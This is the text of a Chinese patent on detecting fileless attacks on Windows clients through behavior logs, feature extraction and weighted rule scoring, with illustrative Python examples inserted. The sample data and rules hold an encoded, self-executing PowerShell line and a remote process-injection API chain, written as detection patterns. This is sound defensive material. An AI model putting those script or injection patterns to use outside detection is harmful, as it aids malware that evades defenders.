Furthermore, a Client/Server communication module is adopted, with the Client communication module and the Server communication module running on the client and the server respectively. It is a lightweight auxiliary program that communicates through a RESTful API (Representational State Transfer application programming interface, a REST network interface) and is responsible for data interaction between the client and the master control end. The Client communication module, also called the agent program, implements an original log data uploading component and a behavior handling mode receiving component. The Server communication module, also called the manager program, implements the corresponding original log data receiving component and behavior handling mode issuing component. The system log and suspicious Payload collected by the behavior log collection module are processed by the original log data uploading component of the Client communication module, which parses the original log and encodes it into a data packet in multipart/form-data (a request format); the packet is uploaded through the RESTful API to the Server communication module, where it is processed by the original log data receiving component.
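As an added illustration of this exchange (example code written for this page, not the patent's or Sangfor's implementation), the following Python shows how the uploading component could encode collected log records as a multipart/form-data body and how the receiving component could decode it with the standard library. The form field names `client_id` and `raw_log`, the boundary and the sample events are assumptions made for this illustration.

```python
import email
import json
import uuid
from typing import Dict, List, Tuple

# Constructed sample: two raw log records as the behavior log collection module
# might hand them to the uploading component (the field layout is assumed).
SAMPLE_EVENTS: List[dict] = [
    {"source": "sysmon", "event_id": 1, "image": "C:\\Windows\\System32\\cmd.exe"},
    {"source": "amsi", "app": "PowerShell", "content_len": 421},
]


def encode_upload(client_id: str, events: List[dict], boundary: str = "") -> Tuple[bytes, str]:
    """Client side (agent): pack records into a multipart/form-data body.

    Returns the body and the Content-Type header value to send with it.
    The field names "client_id" and "raw_log" are hypothetical.
    """
    boundary = boundary or uuid.uuid4().hex  # random hex cannot collide with the payload
    raw_log = "\n".join(json.dumps(e, sort_keys=True) for e in events)
    body = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="client_id"\r\n\r\n'
        f"{client_id}\r\n"
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="raw_log"; filename="events.jsonl"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        f"{raw_log}\r\n"
        f"--{boundary}--\r\n"
    )
    return body.encode("utf-8"), f"multipart/form-data; boundary={boundary}"


def decode_upload(content_type: str, body: bytes) -> Dict[str, object]:
    """Server side (manager): unpack the body back into the client id and records."""
    # The stdlib email parser splits multipart bodies on the boundary once it sees
    # the Content-Type header, so prepend that header as a minimal header block.
    msg = email.message_from_bytes(f"Content-Type: {content_type}\r\n\r\n".encode() + body)
    if not msg.is_multipart():
        raise ValueError("expected a multipart/form-data body")
    fields: Dict[str, bytes] = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        if name is None:
            continue  # a form part without a name is not something the server asked for
        fields[name] = part.get_payload(decode=True) or b""
    if "client_id" not in fields or "raw_log" not in fields:
        raise ValueError("upload is missing a required field")
    events = [json.loads(line) for line in fields["raw_log"].decode("utf-8").splitlines() if line]
    return {"client_id": fields["client_id"].decode("utf-8"), "events": events}
```

In practice the body and content type would travel in an HTTP POST to the manager's REST endpoint; the round trip shown here is the part that decides whether the server sees exactly the records the agent collected.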
Based on this, the method may comprise:
S201, the client records the system behavior of processes, the registry and the network through a system monitoring tool to obtain system behavior information;
In this step, the real-time behavior of the client may be monitored and a log generated based on a System Monitor (Sysmon) or Process Monitor (ProcMon) behavior monitoring program. Sysmon and ProcMon are system monitoring tools in the Windows Sysinternals tool set; they record system behavior information of multiple dimensions such as processes, the registry and the network in real time and cover the main system behaviors. Both accept a user-defined configuration file as a filter for a first-pass screening of the system log. The screened log information is the content of interest to the attack detection method of this embodiment, namely the sensitive system behaviors that a file-free attack may generate and an attacker may use, and it is subsequently used to detect malicious code.
S202, the client monitors interface calling of each process through an interface hook to obtain process behavior information;
the step can be based on a lightweight process injection monitoring program. The program can be automatically started along with the startup, injected into a newly created process of the system, monitors the sensitive API calling process from the API granularity through the API Hook technology, and records the information of calling chains, calling parameters, return values and the like of the API. The purpose of the component is to monitor process injection sensitive API calls that may be utilized in a no-file attack, determine code injection behaviors that may exist in the process through API call chain relationships, and extract suspicious call parameters and memory buffers for subsequent detection.
S203, the client intercepts the used script and the executed module based on the framework through the anti-malware scanning interface and records the intercepted script and the executed module to obtain script behavior information and framework behavior information;
the step can be based on dynamic execution monitoring program of Windows AMSI interface. The detection purpose of using the AMSI interface is mainly used for resisting attack detection based on script and NET Framework, and two sub items of file-free attack are covered. The Script-based file-free attack types mainly include Powershell (a command line shell program and a Script environment), Jscript (a Script language), VBScript (Visual Basic Script language) and VBA (Visual Basic macro language), and the AMSI can intercept the four Script types called in various modes in the system for subsequent detection; NET Framework-based malicious modules are also often loaded and executed in a memory by an attacker in a file-free manner, and an AMSI interface can intercept potential malicious modules in the form of data streams for subsequent detection. Since the AMSI interface is only introduced after Windows 10 and Windows Server2016, Windows 8.1 and following versions of the system do not have this component available, which can be removed/castrated in the lower version of Windows due to the modular nature. In order to ensure complete collection of script type commands, a dynamic monitoring program similar to an AMSI interface working mode needs to be implemented on a Windows 7-Windows 8.1 machine in other modes to perform dynamic monitoring.
S204, the client takes the system behavior information, the process behavior information, the script behavior information and the framework behavior information as the behavior log;
S205, the master control end parses the behavior log according to the log format corresponding to the behavior log to obtain log data;
S206, the master control end extracts features from the log data based on the intrusion target features to obtain behavior features; the behavior features comprise one or more combinations of memory buffer features, execution context features, process dump file features and abnormal load features;
In this step, the memory buffer, execution context, process dump, suspicious Payload and the like in the log data of the behavior log may be extracted and solidified into a feature file, which is passed to the attack feature determination component for subsequent determination.
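As an added example (not the patent's code), the following Python parses constructed records from the three collectors, each in its own format as S205 describes, and pulls out the four feature kinds named in S206. The `SYSMON|`, `APIHOOK|`, `AMSI|` and `DUMP|` record layouts, the field names and the sample lines are all assumptions made for this illustration, not the formats of any real collector.

```python
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed behavior log: one record per line, prefixed with the collector that
# produced it. The layouts below are assumptions, not the patent's log formats.
SAMPLE_LOG = r"""
SYSMON|{"EventId": 1, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
APIHOOK|pid=4120 api=VirtualAllocEx target_pid=5012 ret=0x1f0000
APIHOOK|pid=4120 api=WriteProcessMemory target_pid=5012 ret=0x1 buf=4d5a90000300000004000000ffff0000
AMSI|{"AppName": "PowerShell", "ContentName": "", "Content": "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($e)))"}
DUMP|pid=5012 path=C:\dumps\5012.dmp
"""


@dataclass
class BehaviorFeatures:
    """The four feature kinds named in S206."""
    memory_buffers: List[bytes] = field(default_factory=list)              # bytes handed to sensitive APIs
    execution_context: List[Dict[str, object]] = field(default_factory=list)  # who ran what, and into whom
    process_dumps: List[str] = field(default_factory=list)                 # dump files to inspect later
    abnormal_payloads: List[str] = field(default_factory=list)             # script/module content seen by AMSI


KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_kv(text: str) -> Dict[str, str]:
    """Parse 'key=value key=value' records (the assumed API hook and dump layout)."""
    return dict(KV_RE.findall(text))


def extract_features(log_text: str) -> BehaviorFeatures:
    """Parse each record by its collector's format and extract the features."""
    feats = BehaviorFeatures()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        source, _, body = line.partition("|")
        if source == "SYSMON":
            ev = json.loads(body)
            feats.execution_context.append(
                {"pid": ev["ProcessId"], "image": ev["Image"], "parent": ev["ParentImage"]}
            )
        elif source == "APIHOOK":
            rec = parse_kv(body)
            feats.execution_context.append(
                {"pid": int(rec["pid"]), "api": rec["api"], "target_pid": int(rec["target_pid"])}
            )
            if "buf" in rec:  # hex-encoded buffer captured from the call parameters
                feats.memory_buffers.append(bytes.fromhex(rec["buf"]))
        elif source == "AMSI":
            ev = json.loads(body)
            if ev.get("Content"):
                feats.abnormal_payloads.append(ev["Content"])
        elif source == "DUMP":
            feats.process_dumps.append(parse_kv(body)["path"])
        # Records from unknown collectors are skipped here; a real parser would count them.
    return feats
```

The point of keeping the execution context as a list of small records is that the later matching rules can correlate calls by process id across different collectors, which is the "multi-factor matching between different dimensions" the step S207 text refers to.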
S207, the master control end matches the behavior features against the file-free attack matching rule base to obtain a matching result, and calculates an attack score from the matching result to obtain the detection result.
This step scans the extracted behavior features and returns whether malicious behavior is matched. Each file-free attack matching rule is written as an independent subroutine; each subroutine matches one file-free attack method in a targeted way and carries a certain fractional weight. The detection dimensions of the file-free attack matching rules follow the input of the log collection module and can cover processes, scheduled tasks, system services, the network, the registry, files, WMI, memory and the like; a matching rule can also establish a context to realize multi-factor matching across different dimensions. The attack feature detection flow is as follows: first, the extracted feature files of the plurality of behavior features are received; then a group of file-free attack matching rules scans and weights the malicious items that may be present in the feature files to obtain an attack score; when the attack score is larger than a threshold value, the behavior is judged to be a file-free attack. In addition, an analysis summary can be generated for technicians to consult. It marks the matched file-free attack feature rules and the matched feature file contents, and is divided into high-risk, medium-risk and low-risk levels according to the attack score.
The process is fully automatic and has a high detection rate for file-free attacks with very obvious malicious characteristics. It supports automatic handling of high-risk log alarms and automatically issues the handling results, while for log alarm behaviors whose scores fall in the medium-risk and low-risk ranges it recommends that technicians intervene, analyze and execute mitigation measures.
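The rule matching and scoring flow of S207, together with the analysis summary described earlier (matched rules, matched features and a risk level derived from the score), as an added example written for this page rather than code from the patent: each rule runs as an independent worker (threads stand in here for the sub-processes of the text), carries its own weight, and the weighted matches are summed into an attack score that is compared with a threshold and graded high, medium or low for the summary. The rule names, weights, threshold, grade bands and sample features are all constructed for this illustration.

```python
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List, NamedTuple, Set

Features = Dict[str, object]


class Rule(NamedTuple):
    name: str                               # the file-free attack means this rule targets
    weight: int                             # fractional weight added to the score on a match
    match: Callable[[Features], List[str]]  # returns the matched feature items (empty = no match)


# Constructed behavior features, in the shape the feature extraction step would produce.
SAMPLE_FEATURES: Features = {
    "memory_buffers": [bytes.fromhex("4d5a9000") + b"\x00" * 12],
    "execution_context": [
        {"pid": 4120, "api": "VirtualAllocEx", "target_pid": 5012},
        {"pid": 4120, "api": "WriteProcessMemory", "target_pid": 5012},
        {"pid": 4120, "api": "CreateRemoteThread", "target_pid": 5012},
    ],
    "abnormal_payloads": ["IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($e)))"],
}


def rule_remote_injection_chain(f: Features) -> List[str]:
    """Multi-factor rule across calls: allocate, write and execute all aimed at one foreign pid."""
    chain = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")
    by_target: Dict[int, Set[str]] = {}
    for call in f.get("execution_context", []):
        if "api" in call and "target_pid" in call and call["target_pid"] != call["pid"]:
            by_target.setdefault(call["target_pid"], set()).add(call["api"])
    return [f"pid {t}: {' -> '.join(chain)}" for t, apis in by_target.items() if set(chain) <= apis]


def rule_pe_in_buffer(f: Features) -> List[str]:
    """A PE header ('MZ') in a buffer handed to a sensitive API: a module loaded from memory."""
    return [f"memory_buffers[{i}] starts with MZ"
            for i, b in enumerate(f.get("memory_buffers", [])) if b[:2] == b"MZ"]


def rule_encoded_script(f: Features) -> List[str]:
    """Script content that decodes and evaluates itself at run time."""
    return [p for p in f.get("abnormal_payloads", [])
            if "FromBase64String" in p and ("IEX" in p or "Invoke-Expression" in p)]


RULES: List[Rule] = [
    Rule("remote process injection", 50, rule_remote_injection_chain),
    Rule("in-memory PE load", 30, rule_pe_in_buffer),
    Rule("encoded script execution", 20, rule_encoded_script),
]
ATTACK_THRESHOLD = 40  # constructed: a score above this is judged a file-free attack


def risk_level(score: int) -> str:
    """Constructed bands; the text only says the score maps to high/medium/low risk."""
    if score >= 70:
        return "high"
    if score >= 40:
        return "medium"
    return "low"


def detect(features: Features, rules: List[Rule] = RULES, threshold: int = ATTACK_THRESHOLD) -> Dict[str, object]:
    """Run every rule independently, weight the matches, and build the analysis summary."""
    with ThreadPoolExecutor(max_workers=len(rules)) as pool:
        results = list(pool.map(lambda r: (r, r.match(features)), rules))
    matched = [(r, items) for r, items in results if items]
    score = sum(r.weight for r, _ in matched)
    level = risk_level(score)
    return {
        "score": score,
        "is_fileless_attack": score > threshold,
        "risk_level": level,
        "matched_rules": [r.name for r, _ in matched],
        "matched_features": {r.name: items for r, items in matched},
        # High-risk alarms are handled automatically; medium and low are left to an analyst.
        "auto_handle": level == "high",
    }
```

Two design points carry over from the text: each rule is self-contained, so adding a new file-free attack means is a new rule and a weight rather than a change to the engine, and the summary keeps the matched feature items themselves, not just the rule names, so an analyst reviewing a medium- or low-risk alarm can see what actually fired.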
S208, the client performs abnormal attack handling based on the detection result.
In this step, the client executes the response handling issued by the master control end, which processes the reported suspicious log accordingly. The issued handling commands cover system dimensions such as process operations, scheduled task operations, system service operations, network operations, registry operations, file operations and WMI operations, including mitigation measures for file-free attack behavior such as stopping, deleting and blocking an IP address.
Automated handling may also be performed based on a configuration file. Through a preset configuration file or one issued by the master control end, obviously high-risk sensitive system behaviors can be intercepted directly and the handling result reported. In that case the file-free attack judgment is completed on the client, which shortens the file-free attack handling flow and reduces part of the network communication pressure and handling time. For log rules with a high degree of uncertainty or a high false-alarm rate, the configuration file can predefine that only an alarm is raised on the client without automatic interception; technicians then manually confirm whether behavior handling needs to be executed, and the alarm is cleared after mitigation measures have been executed manually.
In addition, in this embodiment, the suspicious log may be summarized based on the detection result to obtain a suspicious behavior log; and displaying the suspicious logs through a visual management platform.
That is, the reported suspicious log behaviors are collected into a list, and a Web console is provided on which a system administrator can view analysis results, perform behavior handling, check handling results and adjust system configuration. The Web console mainly comprises a user interaction component, an environment configuration component and a data storage component.
The user interaction component is designed with the popular B/S (Browser/Server) architecture, in which the browser sends requests and the server responds, so technicians can access the system's control and management interface through a browser while the main part of the system functionality is hosted entirely on the server side, without consuming a large amount of local resources to run core services. Clients are thus unified: functions that originally required installing a client can be realized with only a browser, which simplifies system development and reduces maintenance cost and configuration difficulty. The user interaction component provides basic user management, client management, log management, handling management, version management, configuration file modification and similar functions. It also implements a user group permission mechanism (dividing, for example, the permissions of ordinary administrators from those of user groups allowed to control clients and system configuration), supports simultaneous management by multiple users, and lets system administrators log in to the management interface through a browser or other terminal to participate conveniently in system management and control.
The environment configuration component consists mainly of a number of configuration files in the config folder under the system's working directory; it receives the input of environment configuration items and applies them to the other system components. Before the system runs, the system administrator needs to modify the configuration files of the components, which can be done from the Web front end through the user interaction component. When the system runs, each module initializes its system component by reading the configuration items from the configuration file, and each component executes its functions according to the predefined items; for example, the configuration file can be modified to specify client IP addresses, log screening rules, the network port monitored by the communication module, the attack feature storage location and the like. After the system is running, the configuration file is sent to each client and the agent program is restarted to apply the latest configuration file.
The data storage component provides storage for the parsed data and the attack feature files and offers an interface for users to query the database, so that a user can look up a client's log records in the system's Web management interface. The data storage component receives original log data, judgment results, handling results and similar information. The analysis result summary of each log alarm is stored in a database, and the extracted malicious Payload is stored in a separate folder corresponding to that log. Using both a database and a file system makes it easy to query analysis data from the database regularly and present it to the user on the Web console as an analysis summary, and also to query and retrieve attack feature files from the file system when manual intervention analysis is needed later for tracing and evidence collection.
In this embodiment, a behavior log is obtained, feature extraction is performed on the behavior log to obtain behavior features, attack detection is performed on the behavior features to obtain a detection result, where the behavior log includes one or a combination of more of system behavior information, process behavior information, script behavior information, and framework behavior information, and the behavior features include one or a combination of more of a memory buffer feature, an execution context feature, a process dump file feature, and an abnormal load feature, so that attack detection is performed on multiple different behavior logs and different behavior features, instead of performing attack detection only on a static file, the scope of attack detection is increased, and the effect of attack detection is improved.
The attack detection device provided by the embodiments of the present application is introduced below; the device described below and the method described above may be cross-referenced with each other.
Referring to fig. 3, fig. 3 is a schematic structural diagram of an attack detection apparatus according to an embodiment of the present disclosure.
In this embodiment, the apparatus may include:
a behavior log collection module 100, configured to obtain a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
the behavior feature extraction module 200 is configured to perform feature extraction on the behavior log to obtain a behavior feature; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and the file-free attack detection module 300 is configured to perform attack detection based on the behavior characteristics to obtain a detection result.
Optionally, the behavior log collecting module 100 is specifically configured to obtain the behavior log through a system monitoring tool and/or an interface hook and/or an anti-malware scanning interface.
Optionally, the file-free attack detection module 300 is specifically configured to match the behavior characteristics based on a plurality of file-free attack matching rules to obtain a matching result; and carrying out attack score calculation on the matching result to obtain a detection result.
Optionally, the file-free attack detection module 300 is specifically configured to set an independent sub-process for each file-free attack matching rule; each subprocess corresponds to a non-file attack means, and each subprocess is provided with different weights; performing file-free attack matching on the behavior characteristics based on each subprocess to obtain a matching result; and carrying out attack score calculation on the matching result based on the weight of each subprocess to obtain a detection result.
Optionally, the apparatus may further include:
the summary analysis module is used for extracting the matched rules and matched features from the matching result; matching a risk level based on the score of the detection result; and performing summary generation based on the matched rules, the matched features and the risk level to obtain an analysis summary.
Optionally, the apparatus may further include:
and the attack handling module is used for carrying out abnormal attack handling based on the detection result.
Optionally, the apparatus may further include:
the log display module is used for summarizing and processing the suspicious logs based on the detection result to obtain suspicious behavior logs; and displaying the suspicious logs through a visual management platform.
An embodiment of the present application further provides a server, including:
a memory for storing a computer program;
a processor for implementing the steps of the attack detection method as described in the above embodiments when executing the computer program.
Embodiments of the present application further provide a computer-readable storage medium, where a computer program is stored on the computer-readable storage medium, and when the computer program is executed by a processor, the steps of the attack detection method according to the above embodiments are implemented.
The embodiments are described in a progressive manner in the specification, each embodiment focuses on differences from other embodiments, and the same and similar parts among the embodiments are referred to each other. The device disclosed by the embodiment corresponds to the method disclosed by the embodiment, so that the description is simple, and the relevant points can be referred to the method part for description.
Those of skill would further appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, computer software, or combinations of both, and that the various illustrative components and steps have been described above generally in terms of their functionality in order to clearly illustrate this interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the implementation. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
The steps of a method or algorithm described in connection with the embodiments disclosed herein may be embodied directly in hardware, in a software module executed by a processor, or in a combination of the two. A software module may reside in Random Access Memory (RAM), memory, Read Only Memory (ROM), electrically programmable ROM, electrically erasable programmable ROM, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known in the art.
The attack detection method, the attack detection device, the server and the computer readable storage medium provided by the present application are described in detail above. The principles and embodiments of the present application are explained herein using specific examples, which are provided only to help understand the method and the core idea of the present application. It should be noted that, for those skilled in the art, it is possible to make several improvements and modifications to the present application without departing from the principle of the present application, and such improvements and modifications also fall within the scope of the claims of the present application.

Claims (10)

1. An attack detection method, comprising:
acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
performing feature extraction on the behavior log to obtain behavior features; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and carrying out attack detection based on the behavior characteristics to obtain a detection result.
2. The attack detection method according to claim 1, wherein the obtaining a behavior log comprises:
and acquiring the behavior log through a system monitoring tool and/or an interface hook and/or an anti-malware scanning interface.
3. The attack detection method according to claim 1, wherein performing attack detection based on the behavior characteristics to obtain a detection result comprises:
matching the behavior characteristics based on a plurality of file-free attack matching rules to obtain a matching result;
and carrying out attack score calculation on the matching result to obtain the detection result.
4. The attack detection method according to claim 3, wherein matching the behavior features based on a plurality of file-free attack matching rules to obtain matching results comprises:
setting an independent sub-process for each file-free attack matching rule; each subprocess corresponds to a non-file attack means, and each subprocess is provided with different weights;
performing file-free attack matching on the behavior characteristics based on each subprocess to obtain a matching result;
correspondingly, calculating the attack score of the matching result to obtain the detection result, wherein the calculation comprises the following steps:
and carrying out attack score calculation on the matching result based on the weight of each subprocess to obtain the detection result.
5. The attack detection method according to claim 1, further comprising:
extracting matched rules and matched features in the matching result;
matching a danger level based on the score of the detection result;
and performing summary generation processing based on the matched rule, the matched features and the danger level to obtain an analysis summary.
6. The attack detection method according to claim 1, further comprising:
and carrying out abnormal attack processing based on the detection result.
7. The attack detection method according to claim 1, further comprising:
performing suspicious log summarizing processing based on the detection result to obtain a suspicious behavior log;
and displaying the suspicious logs through a visual management platform.
8. An attack detection apparatus, comprising:
the behavior log acquisition module is used for acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
the behavior characteristic extraction module is used for extracting the characteristics of the behavior log to obtain behavior characteristics; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and the file-free attack detection module is used for carrying out attack detection based on the behavior characteristics to obtain a detection result.
9. A server, comprising:
a memory for storing a computer program;
a processor for implementing the steps of the attack detection method according to any one of claims 1 to 7 when executing the computer program.
10. A computer-readable storage medium, characterized in that a computer program is stored on the computer-readable storage medium, which computer program, when being executed by a processor, carries out the steps of the attack detection method according to any one of claims 1 to 7.
Application CN202111152699.XA, priority date 2021-09-29, filing date 2021-09-29: Attack detection method and related device, legal status pending, published as CN113886814A (en).


Publications (1)

Publication Number Publication Date
CN113886814A true CN113886814A (en) 2022-01-04

Family

ID=79008130


Country Status (1)

Country Link
CN (1) CN113886814A (en)

Cited By (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114900352A (en) * 2022-04-25 2022-08-12 中国工商银行股份有限公司 Bypass blocking method, bypass blocking apparatus, electronic device, bypass blocking medium, and program product
CN115174201A (en) * 2022-06-30 2022-10-11 北京安博通科技股份有限公司 Security rule management method and device based on screening label
CN115174201B (en) * 2022-06-30 2023-08-01 北京安博通科技股份有限公司 Security rule management method and device based on screening tag
CN116366377A (en) * 2023-06-02 2023-06-30 深信服科技股份有限公司 Malicious file detection method, device, equipment and storage medium
CN116366377B (en) * 2023-06-02 2023-11-07 深信服科技股份有限公司 Malicious file detection method, device, equipment and storage medium


Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination